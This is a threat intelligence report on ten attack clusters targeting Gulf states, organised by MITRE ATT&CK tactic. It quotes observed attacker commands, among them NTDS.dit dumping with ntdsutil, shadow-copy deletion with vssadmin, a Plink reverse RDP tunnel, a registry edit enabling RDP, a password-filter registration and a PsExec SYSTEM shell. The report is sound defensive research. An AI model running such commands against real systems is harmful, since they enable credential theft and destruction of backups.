Threat Zone GCC 2024

Cyber threat overview for the GCC region

 Threat Zone GCC 2024

Contents

Introduction 3

MITRE ATT&CK matrix with a heat map 7

Part 1. Initial Access 8

Part 2. Establishing a Foothold 18

Part 3. Infrastructure Discovery 27

Part 4. Lateral Movement and Impact 32

About BI.ZONE 39

2 www.bi.zone
 Threat Zone GCC 2024

Introduction

The cyber threat landscape is volatile. Cybercriminals utilize newer

and smarter tools, methods, and strategies to reach their goals.
Moreover, threat actors tend to acquire distinct motivations
and specific geographic traits to their crimes. Therefore, it is
important for threat intelligence units to consider regional threat
factors and their diversity.

At BI.ZONE, we have recently issued a comprehensive report—

Threat Zone 2024—on the threat landscape in Russia and
other CIS countries. We continue our exploration of regional
threat landscapes and, this time, we focus on the Middle East,
specifically: Saudi Arabia, Bahrain, Kuwait, Oman, Qatar,
and the United Arab Emirates.

The region is developing fast, adopting new technologies,

and making full use of the advantages that the digital sphere
has to offer. Such transformation boosts a country’s economic
and social development and brings benefits to its people,
businesses, and government. At the same time, digital progress
inevitably brings new threats. This report is our first dive
into the modus operandi of threat actors targeting the region.

In this report, we looked at 10 clusters performing complex

targeted attacks, that were especially active in the region
from 2023 till the first half of 2024, and presented an overview
of their tactics, techniques, and procedures. We named each
cluster according to our own taxonomy based on the motives
of the threat actors:

■ hacktivism: Hyenas
■ financial gain: Wolves
■ espionage: Werewolves

The motives of individual groups are subject to change and vary

over time.

3 www.bi.zone
 Threat Zone GCC 2024

The report consists of 4 parts:

Part 1
Explores initial access techniques and examples of how
adversaries find their way into the victim’s infrastructure.

Part 2
Reveals how malicious actors establish a foothold in the target
system and what routines they utilize to achieve this goal.

Part 3
Includes our findings of how adversaries discover
a compromised infrastructure.

Part 4
Describes common techniques used by threat actors to move
laterally and further impact the infrastructure.

4 www.bi.zone
 Threat Zone GCC 2024

Key takeaways

10
Financial Arthro Wolf Use stolen credentials
motivation to infiltrate
Static Wolf the infrastructure. activity clusters
reviewed in
Actively deploy the report
ransomware in their
attacks

Cyber
espionage
Golden Werewolf Exploit vulnerabilities
and deploy web shells
8 in 10
clusters focus
Noble Werewolf to gain initial access.
on espionage
Iron Werewolf Leverage custom and
commercial malware,
Wonder Werewolf as well as full-featured
post-exploitation
Dancing Werewolf frameworks
Winged Werewolf

Dissent Werewolf

Hacktivism Storm Hyena Utilizes crafty phishing

(and espionage) schemes to attack
government entities.

Targets a variety
of industries:
government, telecom,
insurance, retail,
education, media,
healthcare, finance

5 www.bi.zone
 Threat Zone GCC 2024

■ Financially-motivated clusters are less active in GCC.

This trend may be explained by the low rates of ransom

payouts, considering that targeted attacks commonly involve
ransomware.

■ External-facing remote services are the most common entry

points for adversaries.

Compromising such services is the preferred technique to gain

initial access, especially now that valid credentials are so readily
available.

■ PowerShell is the most common command and scripting

interpreter abused by threat actors in GCC.

This allows adversaries to solve the majority of tasks at any

stage of the attack lifecycle.

■ Some clusters engaged in espionage leverage commercial

tools available on underground marketplaces.

This is noteworthy, as espionage-oriented adversaries

tend to use custom malware. Those involved in espionage
in the region also use custom post-exploitation frameworks
to drastically limit the detection rate.

■ Adversaries active in GCC utilize a wide range of legitimate

remote access tools.

This allows threat actors both to bypass defenses and to gain

persistent access to the compromised environment.

■ The main impact is inflicted by exfiltrated sensitive data.

As most of the activity clusters focus on espionage, they may

get the data either from compromised systems or various data
repositories.

6 www.bi.zone
 Threat Zone GCC 2024

MITRE ATT&CK matrix with a heat map Used by 5 and more groups Used by 4 groups Used by 3 groups or less

Tactic Technique

Drive-by Exploit External Remote Phishing Valid Accounts

Initial Access Compromise Public-Facing Services
Application

Command Exploitation for Native API Scheduled System Services User Execution Windows
Execution and Scripting Client Execution Task/Job Management
Interpreter Instrumentation

Boot or Logon Create Account Create or Modify Event External Remote Hijack Execution Modify Scheduled Server Software Valid Accounts
Persistence Autostart Execution System Process Triggered Execution Services Flow Authentication Task/Job Component
Process

Abuse Elevation Exploitation for Hijack Execution Process Valid Accounts Access Token
Privilege Escalation Control Mechanism Privilege Escalation Flow Injection Manipulation

Abuse Elevation Deobfuscate/ Domain Hide Hijack Impair Impersonation Indicator Indirect Masquerading
Defense Evasion Control Decode Files or Tenant Policy Artifacts Execution Flow Defenses Removal Command
Mechanism or Information Modification Execution

Modify Registry Obfuscated Process System Valid Accounts

Files Injection Binary Proxy
or Information Execution

Brute Force Credentials from Forge Web Input Modify OS Credential Steal or Forge Unsecured
Credential Access Password Stores Credentials Capture Authentication Dumping Kerberos Tickets Credentials
Process

Account Discovery Domain Trust File and Directory Group Policy Network Share Permission Groups Process Discovery Remote System Software Discovery System Information
Discovery Discovery Discovery Discovery Discovery Discovery Discovery Discovery

System Owner/ Virtualization/

User Discovery Sandbox Evasion

Lateral Tool Remote Services Software Use Alternate

Lateral Movement Transfer Deployment Tools Authentication
Material

Archive Collected Automated Clipboard Data Data from Data from Local Data from Network Data Staged Email Collection Input Capture Screen Capture
Collection Data Collection Information System Shared Drive
Repositories

Application Layer Data Encoding Encrypted Channel Ingress Tool Protocol Tunneling Proxy Remote Access Web Service
Command and Control Protocol Transfer Software

Automated Exfiltration Over C2 Exfiltration Over

Exfiltration Exfiltration Channel Web Service

Account Access Data Destruction Data Encrypted Inhibit System Service Stop
Impact Removal for Impact Recovery

7 www.bi.zone
 Threat Zone GCC 2024

Part 1

Initial Access

To attack organizations in the region, the threat actors leverage a wide

range of initial access techniques and sub-techniques. In this part
of the report we will look at some examples of how adversaries gain
access to their targets’ networks.

Wonder Werewolf

8 www.bi.zone
 Threat Zone GCC 2024

External Remote
Services (T1133)

According to BI.ZONE Threat Intelligence observations,

external-facing remote services are the most common
way for threat actors to gain initial access to their targets
in the region.

In most cases adversaries use valid accounts (T1078)

to abuse such services. It is valid both for financially-
motivated activity clusters and those involved in cyber
espionage. For example, both Noble Werewolf and
Arthro Wolf leveraged stolen credentials to access
VPN appliances.

Noble Werewolf

9 www.bi.zone
 Threat Zone GCC 2024

Noble Werewolf
It uses a wide range of initial access techniques,
including the ones that abuse external remote services,
phishing, and strategic web compromise. The adversary Target countries:
uses both off-the-shelf and custom malware like Latin America, Middle East,
MAPLoader. UK, USA

Active since: December 2017 Target industries:

logistics, nuclear,
Aliases: Imperial Kitten, Tortoiseshell, TA456, aerospace, defense, IT
Crimson Sandstorm, Yellow Liderc, HIVE0095,
UNC3890, Cobalt Fireside

Arthro Wolf

The threat actors deploy various ransomware families Target countries:

to compromised environments, including Rhysida, Middle East, Brazil, Germany,
Zeppelin, BlackCat, Quantum, and HelloKitty. Indonesia, Italy, Singapore,
USA
Active since: November 2020
Target industries:
Aliases: Vice Society, Vanilla Tempest, STAC5279, education, healthcare,
Gold Victor government, defense,
manufacturing, retail,
finance, IT

In many cases, adversaries obtain valid authentication

material via stealer logs, which can be either bought through
underground forums and marketplaces, or just collected
from similar sources, including various Telegram channels.

Depending on the obtained privileges, the threat actors may

start moving laterally immediately after remote system
discovery (T1018).

10 www.bi.zone
 Threat Zone GCC 2024

Exploit Public-Facing
Application (T1190)

Many clusters active in the region still use quite old vulnerabilities
in Internet-facing systems to obtain initial access.

For example, Golden Werewolf has been seen to exploit a vulnerability

in SharePoint (CVE-2019-0604), which enabled the adversary to deploy
web shells (T1505.003) and gain persistent access to the compromised
environment.

Golden Werewolf

11 www.bi.zone
 Threat Zone GCC 2024

Golden Werewolf

It runs espionage operations in MENA region and uses Target countries:

a wide range of custom malware and tools, including Bahrain, China, Egypt, Jordan,
Toxocara, Trichuris, and Helminth. Kuwait, Lebanon, Oman, Qatar,
Saudi Arabia, UAE
Active since: 2014
Target industries:
Aliases: OilRig, APT34, Crambus, Hazel Sandstorm, financial, government,
Helix Kitten, Yellow Maero, Cobalt Gypsy energy, telecom

Another example is Iron Werewolf. This cluster actively exploited

both ProxyLogon (CVE-2021-26855) and ProxyShell (CVE-2021-
34473) with the same objective, which was to deploy web shells
to the compromised Microsoft Exchange servers and enable post-
exploitation activities.

Iron Werewolf

It performs targeted attacks with the goal Target countries:

of intelligence collection across a wide range Middle East, Canada, India,
of industry verticals. It uses both common malware Japan, South Korea, Mongolia,
like PlugX as well as custom utilities like SysUpdate. Russia, Thailand, Turkey, UK,
USA
Active since: 2013
Target industries:
Aliases: Emissary Panda, APT27, Budworm, government, manufacturing,
Lucky Mouse, Iron Tiger, Bronze Union, TG-3390, telecom, defense, IT
Earth Smilodon

12 www.bi.zone
 Threat Zone GCC 2024

Phishing
(T1566)

Observed activity clusters often demonstrated

a creative approach to phishing attacks.

For example, Storm Hyena targeted Middle Eastern

government entities with economic-themed lures using
Dropbox links. These links led to malicious Microsoft
PowerPoint Add-in (PPAM) files, which are not very
common among threat actors. As the result, IronWind
malware was installed on compromised systems.

Storm Hyena

13 www.bi.zone
 Threat Zone GCC 2024

Storm Hyena

Its engagements include targeted spearphishing Target countries:

attacks, DDoS attacks, and website defacements. Egypt, Israel, Jordan, Lebanon,
The cluster is involved both in hacktivism and Palestine, Saudi Arabia, Syria,
espionage activities. UAE

Active since: 2011 Target industries:

government, telecom,
Aliases: Molerats, Extreme Jackal, Arid Viper, insurance, retail, education,
APT-C-23, Gaza Cybergang, TA402, Aluminum media, healthcare, finance
Saratoga, Desert Falcon

Interestingly enough, some clusters used not only

phishing emails but also messengers and social networks.
For example, Wonder Werewolf leveraged WhatsApp
to send phishing messages to its targets. Such messages
contained Dropbox links, which led to archives with legitimate
documents and the CMD365 backdoor loader.

Wonder Werewolf

A cluster, which performs targeted espionage-related Target countries: Middle East

attacks against telecommunication providers in the Middle
East using messengers and custom malware. Target industries: telecom

Aliases: WIP26

Some clusters use diverse phishing delivery methods.

For example, Dancing Werewolf used both Facebook and Discord,
as well as phishing emails to deliver links to malicious CAB files,
which allowed the adversary to load the NjRAT binary into memory
and inject it into the legitimate .NET binary file.

14 www.bi.zone
 Threat Zone GCC 2024

Dancing Werewolf

A cluster active at least since mid-2022. The threat Target countries:

actors use NjRAT to attack various organizations Middle East and North Africa
in the Middle East and North Africa.
Target industries:
Active since: mid-2022 various

Aliases: Earth Bogle

Drive-by
Compromise (T1189)

Noble Werewolf was also spotted behind watering

hole attacks to trick victims into downloading
malicious Microsoft Excel files. These files enabled
the adversary to deploy a simple Python backdoor
to the compromised system.

15 www.bi.zone
 Threat Zone GCC 2024

Dancing Werewolf

16 www.bi.zone
 Threat Zone GCC 2024

Winged Werewolf

17 www.bi.zone
 Threat Zone GCC 2024

Part 2

Establishing a Foothold

Once adversaries obtain initial access to the target system, they

need to establish a foothold. This stage involves ingress tool
transfer (T1105) and typically includes persistence, privilege
escalation, defense evasion and credential access routines.

Threat actors leverage not only malware both custom

(e.g., IronWind, TunnelSpecter, PlugX, etc.) and commercial
(e.g., NjRAT and SystemBC) but also full-featured post-exploitation
frameworks. These frameworks include the commercial Cobalt
Strike—one of the most preferred tools for financially-motivated
activity clusters (i.e., ransomware attacks), and Ladon—
the preferred choice for Chinese-speaking adversaries. Some
threat actors even create their own frameworks. For example,
Winged Werewolf leveraged a custom framework named
by Checkpoint researchers LIONTAIL.

Winged Werewolf

It primarily targets government, military, and Target countries:

telecommunication organizations in the Middle East, Middle East
using the LIONTAIL framework. This activity may be
linked to another cluster, Golden Werewolf. Target industries: military,
telecom, IT, finance, NGO
Active since: 2022

Aliases: Scarred Manticore

In this part of the report, we will highlight some

techniques that adversaries use to achieve persistent
access to their targets.

18 www.bi.zone
 Threat Zone GCC 2024

Command and Scripting

Interpreter (T1059)

Many threat actors used quite common interpreters, such

as Windows Command Shell (T1059.003) and PowerShell
(T1059.001). We see examples like this in Golden Werewolf where
a wide range of PowerShell scripts were used to perform tasks
at various stages of the attack lifecycle.

Some activity clusters used multiple scripting interpreters

simultaneously such as the Dancing Werewolf’s dropper dropping
a VBS script (T1059.005), a PowerShell script, and a Windows
batch script.

In some cases, adversaries may install the interpreters they

need directly on the compromised system. For example, Noble
Werewolf downloaded the Python interpreter and used it
to execute a simple shell dropped in the %TEMP% folder.

Windows Management
Instrumentation (T1047)

Adversaries also leverage Windows Management Instrumentation

(WMI) to execute commands on the compromised system. This
is especially popular among threat actors that gather system
information.

For example, Dissent Werewolf used various WMI queries

to collect information about the operating system, network
adapters, drives, services, drivers, processes, users, environment
variables, and installed software.

19 www.bi.zone
 Threat Zone GCC 2024

Dissent Werewolf

It primarily targets journalists, activists, and dissidents Target countries:

in the Middle East. The cluster leverages advanced Middle East
malware such as Deadglyph.
Target industries: media,
Active since: 2012 NGO

Aliases: Stealth Falcon

User Execution (T1204)

Many clusters rely on some victim interaction to deliver malicious

files to the target system, this is known as phishing. As we noted
in Part 1, adversaries may use both emails and messengers
to deliver malicious links (T1204.001) or files (T1204.002) and lure
the target to download it, execute it, and compromise the system.

Event Triggered
Execution (T1546.003)

Many threat actors leverage quite common persistence

mechanisms, such as creating scheduled tasks, dropping
malicious files to the startup folder, and creating new services.

At the same time, some adversaries use more creative

approaches. For example, Dissent Werewolf’s Deadglyth used
WMI Event Subscription to run a registry shellcode loader.

20 www.bi.zone
 Threat Zone GCC 2024

Create Account (T1136)

Adversaries often create new accounts to have persistent access

to the compromised environment. For example, Iron Werewolf
created an account named SUPPORT_388945c0, which mimics
a legitimate default account, SUPPORT_388945a0.

Server Software
Component (T1505)

Since many threat actors, which are active in the region, focus
on exploiting public-facing applications, especially, Microsoft
Exchange servers, they often deploy web shells (T1505.003)
to enable post-exploitation.

One of the most popular examples is China Chopper—

the notorious web shell commonly used by Chinese-speaking
adversaries.

Some frameworks also enable threat actors to use web shells.

A good example is LIONTAIL used by Winged Werewolf.

Access Token
Manipulation (T1134)

In some cases, adversaries do not have enough privileges

to effectively perform post-exploitation activities. Usually, in such
cases, they bring additional tools to enable privilege escalation.

For example, Iron Werewolf used JuicyPotatoNG and

SharpEfsPotato to escalate privileges.

21 www.bi.zone
 Threat Zone GCC 2024

Hijack Execution Flow

(T1574)

Adversaries may use legitimate binaries to side-load malicious

DLLs (T1574.002). For example, Storm Hyena used a legitimate
Timeout.exe to side-load IronWind malware.

System Binary Proxy

Execution (T1218)

To evade some defenses, adversaries leverage legitimate system

binaries for the so-called proxy execution. For example, Dissent
Werewolf used rundll32 (T1218.011) to execute malicious DLLs:

rundll32 C:\Windows\System32\pbrtl.dll,#1

Process Injection
(T1055)

Another quite common technique used by adversaries is

the injection of malicious code into legitimate processes.
For example, Dancing Werewolf leveraged a PowerShell script
to inject NjRAT into aspnet_compiler.exe.

22 www.bi.zone
 Threat Zone GCC 2024

Impair Defenses (T1562)

Adversaries, involved in human-operated ransomware attacks,

often need to disable existing security controls before enabling
ingress tool transfer, and they usually tend to have the appropriate
capabilities. For example, Arthro Wolf used SILENTKILL,
PowerShell-based tool for terminating security-related
processes and services, deleting shadow copies, modifying RDP
configurations, and changing the AD password.

Input Capture (T1056)

To obtain additional credential material, some adversaries tried

to capture user input. For example, Golden Werewolf leveraged
an infostealing malware called Clipog, which enabled them to copy
clipboard data, capture keystrokes, and log the processes that
used keystrokes.

OS Credential Dumping
(T1003)

Interestingly enough, tools like Mimikatz are still extremely popular

both among espionage-focused and financially-motivated activity
clusters. Iron Werewolf and Golden Werewolf are just a few
examples caught using this tool for credential dumping.

23 www.bi.zone
 Threat Zone GCC 2024

Modify Authentication
Process (T1556)

Some adversaries leverage more advanced techniques to obtain

authentication material. For example, Golden Werewolf abused
the password filters in order to obtain credential material
both for domain and local users. The threat actors dropped
psgfilter.dll into C:\Windows\System32 and performed
registry modification to register the Password Filter (HKEY_
LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa
Notification Packages = scecli, psgfilter).

Application Layer
Protocol (T1071)

Despite the fact many activity clusters use web protocols

(T1071.001) to communicate with a compromised system,
some threat actors use a more creative approach.

For example, Iron Werewolf’s TunnelSpecter leverages DNS

tunneling (T1071.004) for communication with the command
and control server.

Another example is Wonder Werewolf’s CMD365, which uses

the Microsoft Graph API with a Microsoft 365 Mail inbox that
has the role of a C2 server (T1071.003).

24 www.bi.zone
 Threat Zone GCC 2024

Web Service (T1102)

Threat actors also use various web services to enable command

and control. For example, Noble Werewolf’s IMAPLoader
connected to imap.yandex[.]com over TLS.

Another example is where Wonder Werewolf’s CMDEmber

interacted with a Google Firebase Realtime Database instance
and used it as the command and control server.

Protocol Tunneling
(T1572)

Adversaries often look for convenient ways to have persistent

access to the compromised environment. For example, Golden
Werewolf used Plink:

msssh.exe [redacted] -P [redacted]-C -N -R

0.0.0.0:54231:127.0.0.1:3389 -l [redacted] -pw
[redacted]

It enabled the threat actors to create a tunnel and use remote

desktop protocol.

25 www.bi.zone
 Threat Zone GCC 2024

Remote Access
Software (T1219)

Many threat actors also leverage legitimate remote access

software as an alternative means of persistent access
to the compromised environment.

For example, Noble Werewolf enabled such access with

MeshAgent, while Arthro Wolf did the same with another popular
remote access tool, AnyDesk.

Dissent Werewolf

26 www.bi.zone
 Threat Zone GCC 2024

Part 3

Infrastructure Discovery

Before moving laterally, adversaries need to collect information

about the compromised IT-infrastructure. They usually collect it
both about the initially compromised system and remote systems.
We tend to distinguish this stage from establishing a foothold
as this is usually a gap between one compromised system and
multiple compromised systems.

In this part of the report, we will look at how various threat actors
perform compromised infrastructure discovery.

Iron Werewolf

27 www.bi.zone
 Threat Zone GCC 2024

Static Wolf

28 www.bi.zone
 Threat Zone GCC 2024

Account Discovery
(T1087)

One of the first discovery steps is for the adversary to collect

information about both local and domain accounts. It is quite
common for threat actors to use Active Directory reconnaissance
tools to obtain such information.

For example, Static Wolf leveraged AdFind to enumerate

domain users.

Static Wolf

The threat actors use leaked LockBit builder to execute Target countries: France,
ransomware attacks worldwide. The group is known Hong Kong, Malaysia, UAE,
to obtain initial access through compromised valid USA
accounts.
Target industries: various
Active since: April 2024

Aliases: EstateRansomware

29 www.bi.zone
 Threat Zone GCC 2024

System Information
Discovery (T1082)

Both malicious software and frameworks leveraged by various

threat actors have the capability to collect compromised system
information.

Winged Werewolf’s LIONTAIL allowed an adversary to use

Windows API to collect system information. For example,
GetComputerNameW was used to get the PC name, while
GetEnvironmentVariableA was used to get the domain name.

Another example is Dissent Werewolf’s Deadglyph. This malware

extensively used WMI to collect a variety of information.
For example, the following query was used to collect information
about the operating system:

SELECT * FROM Win32_Product

Permission Groups
Discovery (T1069)

Threat actors usually need to collect not only system information,

but also information about users and permission groups. They
can either rely on the built-in utilities or use command and
scripting interpreters to achieve this goal.

For example, Golden Werewolf leveraged PowerShell to collect

the information:

powershell -NoProfile -Command ;&

{$j = sajb {$ErrorActionPreference =
‘SilentlyContinue’;$groups = Get-LocalGroup
| Select-Object Name, Domain, SID;foreach($g
in $groups){-join($g.SID,’|’,$g.Name);$members
= Get-LocalGroupMember -SID $g.SID | Select
*;foreach($m in $members){-join(‘ ‘,$m.
SID,’|’,$m.Name,’|’,$m.ObjectClass,’|’,$m.
PrincipalSource);}}};$r = wjb $j -Timeout 300;
rcjb $j;};

30 www.bi.zone
 Threat Zone GCC 2024

Software Discovery
(T1518)

Information about the installed software, and especially security

software, may be extremely important for an adversary as this
may seriously affect the subsequent activities.

We already mentioned Deadglyph’s reconnaissance capabilities.

The malware also uses WMI queries to discover security software:

SELECT * FROM AntiVirusProduct

SELECT * FROM AntiSpywareProduct

SELECT * FROM FirewallProduct

Remote System
Discovery (T1018)

Before starting lateral movement, adversaries usually collect

information about remote systems. In most cases, the threat
actors leverage various network scanners to achieve this goal.

One such scanner is Nbtscan used by Iron Werewolf. This is also

a very popular network scanner among the Chinese-speaking
threat actors.

Another example is SoftPerfect Network Scanner used

by Noble Werewolf. It’s important to note that such scanners
are commonly used by a large number of both espionage-focused
and financially-motivated clusters because these tools
are easy to get and operate. Some threat actors do not even
bother to rename these tools after downloading them from
official websites.

31 www.bi.zone
 Threat Zone GCC 2024

Part 4

Lateral Movement
and Impact

Once threat actors collect enough information about the initially

compromised system and environment, once they obtain proper
authentication material and privileges, they start moving laterally
and achieve further goals.

In the final part we will look at the common techniques noticed

to be used by adversaries during the later stages of the attack
lifecycle.

Desert Wolf

32 www.bi.zone
 Threat Zone GCC 2024

Remote Services (T1021)

Of course, the most common way to move laterally is to abuse

legitimate remote services. Most activity clusters, be they
espionage or ransom, leverage the remote desktop protocol
(T1021.001) to jump from one system to another.

This capability may not be enabled in the compromised

environment, so adversaries have to make some changes
in the settings. For example, Golden Werewolf modified
the registry to achieve this goal:

reg.exe ADD ;HKEY_LOCAL_MACHINE\SYSTEM\

CurentControlSet\Control\Terminal Server; /v
fDenyTSConnections /t REG_DWORD /d 0 /f

Another very popular way to execute commands on a remote

system, distribute tools, or get access to files is to abuse SMB
(T1021.002). For example, adversaries may simply mount
a remote system’s disk to the compromised system to get
access to its contents:

net use \\[redacted]\c$ /user:[redacted]

[redacted]

Adversaries may also abuse it using legitimate tools. For example,

Arthro Wolf leveraged PsExec for a remote command execution:

PsExec.exe -i -s powershell.exe

This approach enabled the threat actors to obtain a PowerShell

and execute commands on the compromised remote system.

Also, adversaries may need to move laterally to the *nix part

of the compromised infrastructure. The SSH (T1021.004)
is commonly used to achieve this and to get, for example,
to the victim’s ESXi servers.

33 www.bi.zone
 Threat Zone GCC 2024

Lateral Tool Transfer

(T1570)

In many cases, an adversary needs to distribute the toolset

from the initially compromised system to another system
in the environment to execute commands, collect information,
and gain redundant access.

Threat actors may use either malware or post-exploitation

frameworks, or even legitimate remote access tools. We
also caught adversaries using AnyDesk, SimpleHelp, Atera,
ScreenConnect, and RemoteUtilities among others.

OS Credential Dumping
(T1003)

Adversaries may need to obtain additional credential material

to get access to more systems in the compromised environment.
They may either use techniques described in Part 2 of this report,
or use other methods, for example, exfiltrate the NTDS.dit file:

ntdsutil.exe ‘ac i ntds’ ‘ifm’ ‘create full

c:\temp_l0gs’ q q

Such dumps are used by adversaries for later cracking.

34 www.bi.zone
 Threat Zone GCC 2024

Data from Local System

(T1005)

Both financially-motivated threat actors and those involved

in espionage collect sensitive data from various systems they
get access to.

Cybercriminals typically focus on all types of sensitive data, like

in the case of ransomware attacks, where criminals steal all
the files they can to post on their Dedicated Leak Site for double
extortion.

Adversaries, who focus on espionage, have a more targeted

approach to data collection. Based on our observations, such
threat actors show interest in China-related information, military
operations, the relations of targeted countries with the President
Biden’s administration, geopolitical and economic information,
telecommunications technology, OPEC operations, etc.

Data from Network

Shared Drive (T1039)

Network shared drives usually contain lots of files from various

users, so it is a gold mine for adversaries and one of the first
things they want to obtain during the lateral movement phase.

35 www.bi.zone
 Threat Zone GCC 2024

Email Collection (T1114)

In some cases, adversaries collect full mailboxes. For example,

Iron Werewolf leveraged PowerShell to achieve this:

New-MailboxExportRequest -Name Request1 -Mailbox

[redacted] -ContentFilter $filter -FilePath
[redacted].pst

Data from Information

Repositories (T1213)

Usually, adversaries don’t limit data collection activities

to obtaining files and folders from compromised systems. They
also leverage various information repositories to collect sensitive
data. This may include SQL databases, Confluence (T1213.001),
SharePoint (T1213.002) to name a few.

Data Staged (T1074)

Adversaries may exfiltrate data directly to the command and

control infrastructure, but in some cases, especially if they collect
data from various information repositories, they may also stage it
on one or multiple compromised systems.

36 www.bi.zone
 Threat Zone GCC 2024

Exfiltration Over C2
Channel (T1041)

As we already mentioned, threat actors active in the region use

a wide range of both custom and open-source\commercial
tools and malware, so their capabilities are commonly abused
to perform collected data exfiltration.

Exfiltration Over Web

Service (T1567)

In some cases, especially when threat actors need to exfiltrate

large datasets, they leverage various web services and tools like
WinSCP, rclone, and others.

Inhibit System Recovery

(T1490)

Financially-motivated adversaries, involved in ransomware

attacks, usually remove any available backups, including those
available by default.

For example, Arthro Wolf’s Rhysida ransomware had the capability

to remove volume shadow copies:

cmd.exe /c vssadmin.exe Delete Shadows /All

/Quiet

37 www.bi.zone
 Threat Zone GCC 2024

Data Encrypted
for Impact (T1486)

In most cases, ransomware attacks involve data encryption.

While some adversaries use custom ransomware samples
or those from ransomware-as-a-service programs, others just
use leaked builders.

For example, Static Wolf leveraged LockBit’s leaked builder

to create a ransomware payload.

Arthro Wolf

38 www.bi.zone
About BI.ZONE

BI.ZONE is an expert in digital risks management that helps

organizations develop their businesses safely in cyberspace.
We design innovative solutions that ensure the resilience
of IT infrastructures of all sizes. Our business portfolio also
includes a wide range of cybersecurity services: from incident
investigation and threat monitoring to secure strategy build-
ing and outsourcing of specialized functions.

See the full range of solutions on our website.

600+
protected clients
800+
investigated incidents

1,200+
completed projects
1,000+
cybersecurity experts

Contact us:

+974 3138 9949

info@bi.zone